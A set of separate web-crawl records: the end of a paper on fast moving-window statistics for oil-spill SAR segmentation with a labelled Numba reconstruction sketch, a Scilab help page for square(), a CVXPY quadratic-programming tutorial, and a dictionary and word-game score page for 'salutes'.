used, scientists can now feel free to study a wider variety of spatial window sizes in order to produce their best models.\n\nFuture developments and implementations of this piece of code will be added to our investigations to study machine learning pixelwise segmentation of oil spills in satellite data.\n\nAlthough MWA and MWSD were the only local window functions studied here, many other textural descriptors, such as fractal dimension and entropy, would be useful in window functions if more efficiently implemented. 
New works can also rethink this article achievement in a GPU parallelism perspective, as it grows to become a standard technique in high performance computing.\n\nAcknowledgements\n\nWe are grateful to the Satellite Oceanography Laboratory (LOS) of the Geo-sciences Institute (IGEO) of the Federal University of Bahia (UFBA) for providing the facilities for the conduction of the experiments and data analysis. LOS is partially financially supported by the National Council for Scientific and Technological Development (CNPq—Research Grant #424495/2018-0). The first author also would like to thank the Undergraduate Research Mentorship Program at UFBA for his scholarship under the same research grant.\n\nConflicts of Interest\n\nThe authors declare no conflicts of interest regarding the publication of this paper.\n\n Shapiro, L.G. and Stockman, G.C. (2001) Computer Vision. Prentice Hall, Upper Saddle River. Singha, S., Bellerby, T.J. and Trieschmann, O. (2013) Satellite Oil Spill Detection Using Artificial Neural Networks. IEEE Journal of Selected Topics in Applied Earth Observations and Remote Sensing, 6, 2355-2363. https://doi.org/10.1109/JSTARS.2013.2251864 Garcia-Pineda, O., MacDonald, I.R., Li, X., Jackson, C.R. and Pichel, W.G. (2013) Oil Spill Mapping and Measurement in the Gulf of Mexico with Textural Classifier Neural Network Algorithm (TCNNA). IEEE Journal of Selected Topics in Applied Earth Observations and Remote Sensing, 6, 2517-2525. https://doi.org/10.1109/JSTARS.2013.2244061 Awad, M. (2010) An Unsupervised Artificial Neural Network Method for Satellite Image Segmentation. The International Arab Journal of Information Technology, 7, 199-205. Liu, Y., Zhang, M.H., Xu, P. and Guo, Z.W. (2017) SAR Ship Detection Using Sea-Land Segmentation-Based Convolutional Neural Network. 2017 IEEE International Workshop on Remote Sensing with Intelligent Processing, Shanghai, 18-21 May 2017, 1-4. https://doi.org/10.1109/RSIP.2017.7958806 Wang, S.-H., et al. (2018) Polarimetric Synthetic Aperture Radar Image Segmentation by Convolutional Neural Network Using Graphical Processing Units. Journal of Real-Time Image Processing, 15, 631-642. https://doi.org/10.1007/s11554-017-0717-0 Prabhu, K.M. (2013) Window Functions and Their Applications in Signal Processing. CRC Press. Mastriani, M. and Giraldez, A.E. (2016) Enhanced Directional Smoothing Algorithm for Edge-Preserving Smoothing of Synthetic-Aperture Radar Images. Maussang, F., Chanussot, J., Hétet, A. and Amate, M. (2007) Mean-Standard Deviation Representation of Sonar Images for Echo Detection: Application to SAS Images. IEEE Journal of Oceanic Engineering, 32, 956-970. https://doi.org/10.1109/JOE.2007.907936 Li, H. and Cao, J. (2010) Detection and Segmentation of Moving Objects Based on Support Vector Machine. 2010 IEEE Third International Symposium on Information Processing, Qingdao, 15-17 October 2010, 193-197. https://doi.org/10.1109/ISIP.2010.35 Highlander, T. and Rodriguez, A. (2016) Very Efficient Training of Convolutional Neural Networks Using Fast Fourier Transform and Overlap-and-Add. In: Xie, X.H., Jones, M.W. and Tam, G.K.L., Eds., Proceedings of the British Machine Vision Conference (BMVC), BMVA Press, Guildford, 160.1-160.9. https://doi.org/10.5244/C.29.160 Lubin, M. and Dunning, I. (2015) Computing in Operations Research Using Julia. INFORMS Journal on Computing, 27, 238-248. https://doi.org/10.1287/ijoc.2014.0623 Lam, S.K., Pitrou, A. and Seibert, S. (2015) Numba: A LLVM-Based Python JIT Compiler. 
Proceedings of the Second Workshop on the LLVM Compiler Infrastructure in HPC, November 2015, 1-6. https://doi.org/10.1145/2833157.2833162 So, S. (2008) Why Is the Sample Variance a Biased Estimator? Griffith University, Brisbane, Tech. Rep. 9. Ma, Y.Z. (2019) Quantitative Geosciences: Data Analytics, Geostatistics, Reservoir Characterization and Modeling. Springer International Publishing, Berlin. https://doi.org/10.1007/978-3-030-17860-4 Murray, M.R. and Baker, D.E. (1991) MWINDOW: An Interactive FORTRAN-77 Program for Calculating Moving-Window Statistics. Computers & Geosciences, 17, 423-430. https://doi.org/10.1016/0098-3004(91)90049-J Behnel, S., et al. (2011) Cython: The Best of Both Worlds. Computing in Science & Engineering, IEEE Computer Society, 13, 31-39. https://doi.org/10.1109/MCSE.2010.118 Behnel, S., Bradshaw, R., Citro, C., Dalcin, L., Seljebotn, D.S. and Smith, K. (2011) Cython: The Best of Both Worlds. Computing in Science & Engineering, 13, 31-39. https://doi.org/10.1109/MCSE.2010.118 Guidorizzi, H.L. (2012) Um curso de cálculo, Vol. 1, 5a edicao. Grupo Gen-LTC." ]
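Code 1 and Code 2 above are presented as figures in the original article. As a rough reconstruction of the idea described in Sections 2.3 and 2.4 (and not the authors' published code, which lives at github.com/marcosrdac/mwsd), a Numba-compiled 2D MWSD might look like the sketch below; the function and variable names are ours, and the parallel loop here runs over output rows rather than the column loop the paper mentions.

```python
# Reconstruction sketch (not the authors' code): 2D moving-window standard
# deviation in O(N*M*n) by updating running sums as the window slides,
# using Equation (2), manual zero padding, and Numba parallelization.
import numpy as np
import numba


@numba.njit(parallel=True)
def mwsd_2d(image, n=3):
    """n x n moving-window standard deviation with zero padding (n odd)."""
    rows, cols = image.shape
    half = n // 2
    # Manual zero padding; np.pad is avoided, as discussed in the paper.
    padded = np.zeros((rows + 2 * half, cols + 2 * half), dtype=np.float64)
    padded[half:half + rows, half:half + cols] = image
    out = np.empty((rows, cols), dtype=np.float64)
    ne = n * n
    for i in numba.prange(rows):              # parallel over output rows
        block = padded[i:i + n, :]            # the n padded rows this output row sees
        s = 0.0                               # running sum of x
        s2 = 0.0                              # running sum of x**2
        for jj in range(n):                   # build the first window of this row
            for ii in range(n):
                v = block[ii, jj]
                s += v
                s2 += v * v
        out[i, 0] = np.sqrt(max(s2 / ne - (s / ne) ** 2, 0.0))
        for j in range(1, cols):              # slide the window one column right
            for ii in range(n):
                v_out = block[ii, j - 1]      # strip leaving the window
                v_in = block[ii, j + n - 1]   # strip entering the window
                s += v_in - v_out
                s2 += v_in * v_in - v_out * v_out
            out[i, j] = np.sqrt(max(s2 / ne - (s / ne) ** 2, 0.0))
    return out
```

On the first call Numba compiles the function, so that call includes compilation time; subsequent calls run at compiled speed, which matches the timing behaviour reported in Section 3 above.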
[ null, "https://html.scirp.org/file/3-2570241x7.png", null, "https://html.scirp.org/file/3-2570241x9.png", null, "https://scirp.org/images/Twitter.svg", null, "https://scirp.org/images/fb.svg", null, "https://scirp.org/images/in.svg", null, "https://scirp.org/images/weibo.svg", null, "https://scirp.org/images/emailsrp.png", null, "https://scirp.org/images/whatsapplogo.jpg", null, "https://scirp.org/Images/qq25.jpg", null, "https://scirp.org/images/weixinlogo.jpg", null, "https://scirp.org/images/weixinsrp120.jpg", null, "https://scirp.org/Images/ccby.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9378031,"math_prob":0.89580256,"size":20029,"snap":"2022-05-2022-21","text_gpt3_token_len":4289,"char_repetition_ratio":0.12459426,"word_repetition_ratio":0.01518309,"special_character_ratio":0.21119377,"punctuation_ratio":0.09741126,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9846787,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24],"im_url_duplicate_count":[null,4,null,4,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-23T03:02:10Z\",\"WARC-Record-ID\":\"<urn:uuid:4b63debd-6827-41b8-9ec9-96e9a5712e87>\",\"Content-Length\":\"124693\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6ff23194-f08e-4ea7-bcd0-4f959b379090>\",\"WARC-Concurrent-To\":\"<urn:uuid:f8a8b222-1213-47ad-879f-6ab4f33ffd6e>\",\"WARC-IP-Address\":\"144.126.144.39\",\"WARC-Target-URI\":\"https://scirp.org/journal/paperinformation.aspx?paperid=101849\",\"WARC-Payload-Digest\":\"sha1:M5M66WNRJ5YEAIUD7LK6CWBOYYQK3SK2\",\"WARC-Block-Digest\":\"sha1:JWI5VC3DLH6NRDYKSBBHCB7G6CQCMXQA\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662552994.41_warc_CC-MAIN-20220523011006-20220523041006-00162.warc.gz\"}"}
https://help.scilab.org/docs/6.0.2/ru_RU/square.html
[ "# square\n\nset scales for isometric plot (change the size of the window) (function obsolete)\n\n### Syntax\n\n`square(xmin, ymin, xmax, ymax)`\n\n### Arguments\n\nxmin, xmax, ymin, ymax\n\nfour real values.\n\n### Description", null, "This function is obsolete. It will be removed in Scilab 6.1.", null, "Please replace `square(a,b,c,d)` with `gcf().axes_size = [n n]; replot([a b c d])` where `n` is the size in pixels of the desired graphic square window. This replacement can be extended to any existing graphic window, not only the current one.\n\n`square` is used to have isometric scales on the x and y axes. The requested values `xmin`, `xmax`, `ymin`, `ymax` are the boundaries of the graphics frame and `square` changes the graphics window dimensions in order to have an isometric plot. `square` sets the current graphics scales and can be used in conjunction with graphics routines which request the current graphics scale (for instance `strf=\"x0z\"` in `plot2d`).\n\n### Examples\n\n```t=[0:0.1:2*%pi]';\nplot2d(sin(t),cos(t))\nclf()\nsquare(-1,-1,1,1)\nplot2d(sin(t),cos(t))```\n\n### See also\n\n• isoview — adjusts the isometric representation of the graphics axes\n• xsetech — set the sub-window of a graphics window for plotting\n\n### History\n\nVersion 6.0: square() is tagged as obsolete. It will be removed from Scilab 6.1" ]
[ null, "https://help.scilab.org/docs/6.0.2/ru_RU/ScilabWarning.png", null, "https://help.scilab.org/docs/6.0.2/ru_RU/ScilabWarning.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5897032,"math_prob":0.9399205,"size":1130,"snap":"2020-24-2020-29","text_gpt3_token_len":306,"char_repetition_ratio":0.123445824,"word_repetition_ratio":0.010869565,"special_character_ratio":0.23451327,"punctuation_ratio":0.13839285,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98267025,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-06-06T23:46:31Z\",\"WARC-Record-ID\":\"<urn:uuid:5e945b6b-35d6-435e-a0f6-27637b8bda2b>\",\"Content-Length\":\"25659\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:fb0d3b9a-9134-4c51-bf75-7531f9f4cf4f>\",\"WARC-Concurrent-To\":\"<urn:uuid:e51af3fb-406c-4ab1-9546-2c43023777a7>\",\"WARC-IP-Address\":\"176.9.3.186\",\"WARC-Target-URI\":\"https://help.scilab.org/docs/6.0.2/ru_RU/square.html\",\"WARC-Payload-Digest\":\"sha1:Q35XO6XV7J3YP2PQUUJ4BARINN2SKV6W\",\"WARC-Block-Digest\":\"sha1:KITXGCQUQ4MK55SBQMMD3SUK7WNZ3SZP\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-24/CC-MAIN-2020-24_segments_1590348521325.84_warc_CC-MAIN-20200606222233-20200607012233-00173.warc.gz\"}"}
https://www.cvxpy.org/examples/basic/quadratic_program.html
[ "A quadratic program is an optimization problem with a quadratic objective and affine equality and inequality constraints. A common standard form is the following:\n\n$\\begin{split}\\begin{array}{ll} \\mbox{minimize} & (1/2)x^TPx + q^Tx\\\\ \\mbox{subject to} & Gx \\leq h \\\\ & Ax = b. \\end{array}\\end{split}$\n\nHere $$P \\in \\mathcal{S}^{n}_+$$, $$q \\in \\mathcal{R}^n$$, $$G \\in \\mathcal{R}^{m \\times n}$$, $$h \\in \\mathcal{R}^m$$, $$A \\in \\mathcal{R}^{p \\times n}$$, and $$b \\in \\mathcal{R}^p$$ are problem data and $$x \\in \\mathcal{R}^{n}$$ is the optimization variable. The inequality constraint $$Gx \\leq h$$ is elementwise.\n\nA simple example of a quadratic program arises in finance. Suppose we have $$n$$ different stocks, an estimate $$r \\in \\mathcal{R}^n$$ of the expected return on each stock, and an estimate $$\\Sigma \\in \\mathcal{S}^{n}_+$$ of the covariance of the returns. Then we solve the optimization problem\n\n$\\begin{split}\\begin{array}{ll} \\mbox{minimize} & (1/2)x^T\\Sigma x - r^Tx\\\\ \\mbox{subject to} & x \\geq 0 \\\\ & \\mathbf{1}^Tx = 1, \\end{array}\\end{split}$\n\nto find a portfolio allocation $$x \\in \\mathcal{R}^n_+$$ that optimally balances expected return and variance of return.\n\nWhen we solve a quadratic program, in addition to a solution $$x^\\star$$, we obtain a dual solution $$\\lambda^\\star$$ corresponding to the inequality constraints. A positive entry $$\\lambda^\\star_i$$ indicates that the constraint $$g_i^Tx \\leq h_i$$ holds with equality for $$x^\\star$$ and suggests that changing $$h_i$$ would change the optimal value.\n\n## Example\n\nIn the following code, we solve a quadratic program with CVXPY.\n\n# Import packages.\nimport cvxpy as cp\nimport numpy as np\n\n# Generate a random non-trivial quadratic program.\nm = 15\nn = 10\np = 5\nnp.random.seed(1)\nP = np.random.randn(n, n)\nP = P.T @ P\nq = np.random.randn(n)\nG = np.random.randn(m, n)\nh = G @ np.random.randn(n)\nA = np.random.randn(p, n)\nb = np.random.randn(p)\n\n# Define and solve the CVXPY problem.\nx = cp.Variable(n)\nprob = cp.Problem(cp.Minimize((1/2)*cp.quad_form(x, P) + q.T @ x),\n                  [G @ x <= h,\n                   A @ x == b])\nprob.solve()\n\n# Print result.\nprint(\"\\nThe optimal value is\", prob.value)\nprint(\"A solution x is\")\nprint(x.value)\nprint(\"A dual solution corresponding to the inequality constraints is\")\nprint(prob.constraints[0].dual_value)\n\nThe optimal value is 86.89141585569918\nA solution x is\n[-1.68244521 0.29769913 -2.38772183 -2.79986015 1.18270433 -0.20911897\n-4.50993526 3.76683701 -0.45770675 -3.78589638]\nA dual solution corresponding to the inequality constraints is\n[ 0. 0. 0. 0. 0. 10.45538054\n0. 0. 0. 39.67365045 0. 0.\n0. 20.79927156 6.54115873]" ]
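The portfolio-allocation problem described above is not coded on the page itself; a minimal CVXPY sketch of it, with randomly generated placeholder data for Σ and r (our assumption, not values from the page), could look like this:

```python
# Portfolio-allocation QP from the prose above; Sigma and r below are random
# placeholders, not data from the original example.
import cvxpy as cp
import numpy as np

np.random.seed(1)
n = 10
Sigma = np.random.randn(n, n)
Sigma = Sigma.T @ Sigma            # makes Sigma symmetric positive semidefinite
r = np.random.randn(n)             # estimated expected returns

x = cp.Variable(n)
objective = cp.Minimize(0.5 * cp.quad_form(x, Sigma) - r.T @ x)
constraints = [x >= 0, cp.sum(x) == 1]
prob = cp.Problem(objective, constraints)
prob.solve()

print("Optimal portfolio allocation:", x.value)
print("Dual variables for x >= 0:", constraints[0].dual_value)
```

The entries of x.value are the fractions of the portfolio held in each stock; the x >= 0 constraint rules out short positions, matching the description of the allocation as an element of R^n_+ above.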
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7020929,"math_prob":0.9999963,"size":2342,"snap":"2020-45-2020-50","text_gpt3_token_len":726,"char_repetition_ratio":0.13601369,"word_repetition_ratio":0.017595308,"special_character_ratio":0.35781384,"punctuation_ratio":0.16768916,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.0000048,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-30T14:09:55Z\",\"WARC-Record-ID\":\"<urn:uuid:db72dcd9-2b12-45d2-9b7c-28fd024fee05>\",\"Content-Length\":\"15724\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cb88bdf1-9104-4553-a3ec-a405e70f2858>\",\"WARC-Concurrent-To\":\"<urn:uuid:b961987b-0f84-4ddd-be0e-9a6c44db546a>\",\"WARC-IP-Address\":\"185.199.108.153\",\"WARC-Target-URI\":\"https://www.cvxpy.org/examples/basic/quadratic_program.html\",\"WARC-Payload-Digest\":\"sha1:UTYRE2NAZX7X4MWXWAFYOJ7L3OASZJJG\",\"WARC-Block-Digest\":\"sha1:D42M662UY7STDPJYFFYXUWO5J7HAWYG7\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107910815.89_warc_CC-MAIN-20201030122851-20201030152851-00353.warc.gz\"}"}
https://www.litscape.com/word_analysis/salutes
[ "# Definition of salutes\n\n## \"salutes\" in the noun sense\n\n### 1. salute, salutation\n\nan act of honor or courteous recognition\n\n\"a musical salute to the composer on his birthday\"\n\n### 2. salute, military greeting\n\na formal military gesture of respect\n\n### 3. salute\n\nan act of greeting with friendly words and gestures like bowing or lifting the hat\n\n## \"salutes\" in the verb sense\n\n### 1. toast, drink, pledge, salute, wassail\n\npropose a toast to\n\n\"Let us toast the birthday girl!\"\n\n\"Let's drink to the New Year\"\n\n### 2. salute\n\ngreet in a friendly way\n\n\"I meet this men every day on my way to work and he salutes me\"\n\n### 3. salute\n\nexpress commendation of\n\n### 4. salute\n\nbecome noticeable\n\n\"a terrible stench saluted our nostrils\"\n\n### 5. salute\n\nhonor with a military ceremony, as when honoring dead soldiers\n\n### 6. salute, present\n\nrecognize with a gesture prescribed by a military regulation assume a prescribed position\n\n\"When the officers show up, the soldiers have to salute\"\n\nSource: WordNet® (An amazing lexical database of English)\n\nWordNet®. Princeton University. 2010.\n\n# salutes in Scrabble®\n\nThe word salutes is playable in Scrabble®, no blanks required.\n\nTALUSES\n(78 = 28 + 50)\nSALUTES\n(78 = 28 + 50)\n\nsalutes, taluses\n\nSALUTES\n(78 = 28 + 50)\nSALUTES\n(74 = 24 + 50)\nSALUTES\n(74 = 24 + 50)\nSALUTES\n(74 = 24 + 50)\nSALUTES\n(74 = 24 + 50)\nSALUTES\n(74 = 24 + 50)\nSALUTES\n(74 = 24 + 50)\nSALUTES\n(74 = 24 + 50)\nSALUTES\n(74 = 24 + 50)\nSALUTES\n(71 = 21 + 50)\nSALUTES\n(68 = 18 + 50)\nSALUTES\n(68 = 18 + 50)\nSALUTES\n(68 = 18 + 50)\nSALUTES\n(68 = 18 + 50)\nSALUTES\n(68 = 18 + 50)\nSALUTES\n(68 = 18 + 50)\nSALUTES\n(66 = 16 + 50)\nSALUTES\n(66 = 16 + 50)\nSALUTES\n(66 = 16 + 50)\nSALUTES\n(66 = 16 + 50)\nSALUTES\n(66 = 16 + 50)\nSALUTES\n(66 = 16 + 50)\nSALUTES\n(66 = 16 + 50)\nSALUTES\n(66 = 16 + 50)\nSALUTES\n(64 = 14 + 50)\nSALUTES\n(64 = 14 + 50)\nSALUTES\n(64 = 14 + 50)\nSALUTES\n(64 = 14 + 50)\nSALUTES\n(64 = 14 + 50)\nSALUTES\n(61 = 11 + 50)\nSALUTES\n(61 = 11 + 50)\nSALUTES\n(61 = 11 + 50)\nSALUTES\n(60 = 10 + 50)\nSALUTES\n(60 = 10 + 50)\nSALUTES\n(59 = 9 + 50)\nSALUTES\n(59 = 9 + 50)\nSALUTES\n(59 = 9 + 50)\nSALUTES\n(59 = 9 + 50)\nSALUTES\n(59 = 9 + 50)\nSALUTES\n(59 = 9 + 50)\nSALUTES\n(59 = 9 + 50)\nSALUTES\n(58 = 8 + 50)\n\nTALUSES\n(78 = 28 + 50)\nSALUTES\n(78 = 28 + 50)\nTALUSES\n(74 = 24 + 50)\nSALUTES\n(74 = 24 + 50)\nTALUSES\n(74 = 24 + 50)\nSALUTES\n(74 = 24 + 50)\nSALUTES\n(74 = 24 + 50)\nTALUSES\n(74 = 24 + 50)\nTALUSES\n(74 = 24 + 50)\nTALUSES\n(74 = 24 + 50)\nSALUTES\n(74 = 24 + 50)\nSALUTES\n(74 = 24 + 50)\nSALUTES\n(74 = 24 + 50)\nTALUSES\n(74 = 24 + 50)\nTALUSES\n(74 = 24 + 50)\nSALUTES\n(74 = 24 + 50)\nSALUTES\n(74 = 24 + 50)\nTALUSES\n(74 = 24 + 50)\nTALUSES\n(71 = 21 + 50)\nSALUTES\n(71 = 21 + 50)\nSALUTES\n(68 = 18 + 50)\nTALUSES\n(68 = 18 + 50)\nTALUSES\n(68 = 18 + 50)\nTALUSES\n(68 = 18 + 50)\nTALUSES\n(68 = 18 + 50)\nTALUSES\n(68 = 18 + 50)\nTALUSES\n(68 = 18 + 50)\nSALUTES\n(68 = 18 + 50)\nSALUTES\n(68 = 18 + 50)\nSALUTES\n(68 = 18 + 50)\nSALUTES\n(68 = 18 + 50)\nSALUTES\n(68 = 18 + 50)\nTALUSES\n(66 = 16 + 50)\nSALUTES\n(66 = 16 + 50)\nTALUSES\n(66 = 16 + 50)\nSALUTES\n(66 = 16 + 50)\nSALUTES\n(66 = 16 + 50)\nTALUSES\n(66 = 16 + 50)\nTALUSES\n(66 = 16 + 50)\nTALUSES\n(66 = 16 + 50)\nSALUTES\n(66 = 16 + 50)\nTALUSES\n(66 = 16 + 50)\nSALUTES\n(66 = 16 + 50)\nSALUTES\n(66 = 16 + 50)\nTALUSES\n(66 = 16 + 50)\nSALUTES\n(66 = 16 + 50)\nSALUTES\n(66 = 16 + 
50)\nTALUSES\n(66 = 16 + 50)\nTALUSES\n(64 = 14 + 50)\nTALUSES\n(64 = 14 + 50)\nTALUSES\n(64 = 14 + 50)\nTALUSES\n(64 = 14 + 50)\nSALUTES\n(64 = 14 + 50)\nTALUSES\n(64 = 14 + 50)\nSALUTES\n(64 = 14 + 50)\nSALUTES\n(64 = 14 + 50)\nSALUTES\n(64 = 14 + 50)\nSALUTES\n(64 = 14 + 50)\nSALUTES\n(61 = 11 + 50)\nTALUSES\n(61 = 11 + 50)\nSALUTES\n(61 = 11 + 50)\nSALUTES\n(61 = 11 + 50)\nTALUSES\n(61 = 11 + 50)\nTALUSES\n(61 = 11 + 50)\nTALUSES\n(60 = 10 + 50)\nSALUTES\n(60 = 10 + 50)\nTALUSES\n(60 = 10 + 50)\nSALUTES\n(60 = 10 + 50)\nTALUSES\n(59 = 9 + 50)\nSALUTES\n(59 = 9 + 50)\nSALUTES\n(59 = 9 + 50)\nSALUTES\n(59 = 9 + 50)\nSALUTES\n(59 = 9 + 50)\nSALUTES\n(59 = 9 + 50)\nSALUTES\n(59 = 9 + 50)\nTALUSES\n(59 = 9 + 50)\nTALUSES\n(59 = 9 + 50)\nTALUSES\n(59 = 9 + 50)\nTALUSES\n(59 = 9 + 50)\nSALUTES\n(59 = 9 + 50)\nTALUSES\n(59 = 9 + 50)\nTALUSES\n(59 = 9 + 50)\nSALUTES\n(58 = 8 + 50)\nTALUSES\n(58 = 8 + 50)\nTASSEL\n(21)\nSLATES\n(21)\nTESLAS\n(21)\nSAUTES\n(21)\nSALUTE\n(21)\nSLATES\n(21)\nSTALES\n(21)\nSALUTE\n(21)\nSLATES\n(21)\nSALUTE\n(21)\nSLATES\n(21)\nTESLAS\n(21)\nSAUTES\n(21)\nSAUTES\n(21)\nSTALES\n(21)\nTASSEL\n(21)\nTASSEL\n(21)\nSTALES\n(21)\nTASSEL\n(21)\nTESLAS\n(21)\nSTALES\n(21)\nSALUTE\n(21)\nSTALES\n(21)\nSAUTES\n(21)\nTESLAS\n(21)\nSAUTES\n(21)\nTASSEL\n(21)\nSAUTES\n(21)\nSTALES\n(21)\nTASSEL\n(21)\nSALUTE\n(21)\nSTEALS\n(21)\nSTEALS\n(21)\nSALUTE\n(21)\nTUSSLE\n(21)\nTUSSLE\n(21)\nTUSSLE\n(21)\nTUSSLE\n(21)\nSLATES\n(21)\nSLATES\n(21)\nSTEALS\n(21)\nTUSSLE\n(21)\nTESLAS\n(21)\nSTEALS\n(21)\nTESLAS\n(21)\nSTEALS\n(21)\nTUSSLE\n(21)\nSTEALS\n(21)\nLASTS\n(18)\nLEAST\n(18)\nLEAST\n(18)\nLEAST\n(18)\nTALUS\n(18)\nLUSTS\n(18)\nTESLA\n(18)\nLUSTS\n(18)\nLUSTS\n(18)\nLUSTS\n(18)\nLEAST\n(18)\nLASTS\n(18)\nTESLA\n(18)\nTALUS\n(18)\nSALUTE\n(18)\nTASSEL\n(18)\nSALES\n(18)\nSALUTE\n(18)\nSALTS\n(18)\nSALTS\n(18)\nSALTS\n(18)\nSALTS\n(18)\nTEALS\n(18)\nTEALS\n(18)\nTALES\n(18)\nTALES\n(18)\nSALES\n(18)\nSALES\n(18)\nTALUS\n(18)\nTALES\n(18)\nTALES\n(18)\nTEALS\n(18)\nLASTS\n(18)\nLUTES\n(18)\nLUTES\n(18)\nLUTES\n(18)\nTEALS\n(18)\nLASTS\n(18)\nLUTES\n(18)\nTASSEL\n(18)\nTALUS\n(18)\nSALES\n(18)\nTESLA\n(18)\nSLATS\n(18)\nSEATS\n(18)\nSTEAL\n(18)\nSTEAL\n(18)\nTUSSLE\n(18)\nSLATS\n(18)\nSLATS\n(18)\nSLATS\n(18)\nSTALE\n(18)\nTUSSLE\n(18)\nSTALE\n(18)\nSTEALS\n(18)\nSTALE\n(18)\nSTALES\n(18)\nSEALS\n(18)\nSEALS\n(18)\nSEALS\n(18)\nSEATS\n(18)\nSEATS\n(18)\nSTALES\n(18)\nSLATE\n(18)\nASSET\n(18)\nSETAL\n(18)\nSETAL\n(18)\nSETAL\n(18)\n\n# salutes in Words With Friends™\n\nThe word salutes is playable in Words With Friends™, no blanks required.\n\nTALUSES\n(80 = 45 + 35)\nSALUTES\n(80 = 45 + 35)\nTALUSES\n(80 = 45 + 35)\nSALUTES\n(80 = 45 + 35)\nTALUSES\n(80 = 45 + 35)\nSALUTES\n(80 = 45 + 35)\n\nsalutes, taluses\n\nSALUTES\n(80 = 45 + 35)\nSALUTES\n(80 = 45 + 35)\nSALUTES\n(80 = 45 + 35)\nSALUTES\n(74 = 39 + 35)\nSALUTES\n(74 = 39 + 35)\nSALUTES\n(74 = 39 + 35)\nSALUTES\n(71 = 36 + 35)\nSALUTES\n(71 = 36 + 35)\nSALUTES\n(71 = 36 + 35)\nSALUTES\n(68 = 33 + 35)\nSALUTES\n(68 = 33 + 35)\nSALUTES\n(68 = 33 + 35)\nSALUTES\n(68 = 33 + 35)\nSALUTES\n(61 = 26 + 35)\nSALUTES\n(57 = 22 + 35)\nSALUTES\n(57 = 22 + 35)\nSALUTES\n(57 = 22 + 35)\nSALUTES\n(57 = 22 + 35)\nSALUTES\n(57 = 22 + 35)\nSALUTES\n(57 = 22 + 35)\nSALUTES\n(55 = 20 + 35)\nSALUTES\n(55 = 20 + 35)\nSALUTES\n(55 = 20 + 35)\nSALUTES\n(55 = 20 + 35)\nSALUTES\n(55 = 20 + 35)\nSALUTES\n(53 = 18 + 35)\nSALUTES\n(53 = 18 + 35)\nSALUTES\n(53 = 18 + 35)\nSALUTES\n(53 = 18 + 35)\nSALUTES\n(53 = 18 + 35)\nSALUTES\n(53 = 18 + 35)\nSALUTES\n(53 = 
18 + 35)\nSALUTES\n(50 = 15 + 35)\nSALUTES\n(50 = 15 + 35)\nSALUTES\n(48 = 13 + 35)\nSALUTES\n(48 = 13 + 35)\nSALUTES\n(48 = 13 + 35)\nSALUTES\n(48 = 13 + 35)\nSALUTES\n(48 = 13 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(46 = 11 + 35)\nSALUTES\n(46 = 11 + 35)\nSALUTES\n(46 = 11 + 35)\nSALUTES\n(46 = 11 + 35)\nSALUTES\n(46 = 11 + 35)\nSALUTES\n(46 = 11 + 35)\nSALUTES\n(45 = 10 + 35)\nSALUTES\n(45 = 10 + 35)\nSALUTES\n(45 = 10 + 35)\nSALUTES\n(44 = 9 + 35)\n\nTALUSES\n(80 = 45 + 35)\nSALUTES\n(80 = 45 + 35)\nTALUSES\n(80 = 45 + 35)\nSALUTES\n(80 = 45 + 35)\nTALUSES\n(80 = 45 + 35)\nSALUTES\n(80 = 45 + 35)\nTALUSES\n(74 = 39 + 35)\nTALUSES\n(74 = 39 + 35)\nSALUTES\n(74 = 39 + 35)\nSALUTES\n(74 = 39 + 35)\nTALUSES\n(74 = 39 + 35)\nSALUTES\n(74 = 39 + 35)\nTALUSES\n(71 = 36 + 35)\nTALUSES\n(71 = 36 + 35)\nSALUTES\n(71 = 36 + 35)\nSALUTES\n(71 = 36 + 35)\nSALUTES\n(71 = 36 + 35)\nTALUSES\n(71 = 36 + 35)\nTALUSES\n(68 = 33 + 35)\nSALUTES\n(68 = 33 + 35)\nSALUTES\n(68 = 33 + 35)\nTALUSES\n(68 = 33 + 35)\nTALUSES\n(68 = 33 + 35)\nTALUSES\n(68 = 33 + 35)\nSALUTES\n(68 = 33 + 35)\nSALUTES\n(68 = 33 + 35)\nTALUSES\n(61 = 26 + 35)\nSALUTES\n(61 = 26 + 35)\nTALUSES\n(57 = 22 + 35)\nTALUSES\n(57 = 22 + 35)\nSALUTES\n(57 = 22 + 35)\nTALUSES\n(57 = 22 + 35)\nSALUTES\n(57 = 22 + 35)\nTALUSES\n(57 = 22 + 35)\nSALUTES\n(57 = 22 + 35)\nTALUSES\n(57 = 22 + 35)\nSALUTES\n(57 = 22 + 35)\nSALUTES\n(57 = 22 + 35)\nTALUSES\n(57 = 22 + 35)\nSALUTES\n(57 = 22 + 35)\nSALUTES\n(55 = 20 + 35)\nSALUTES\n(55 = 20 + 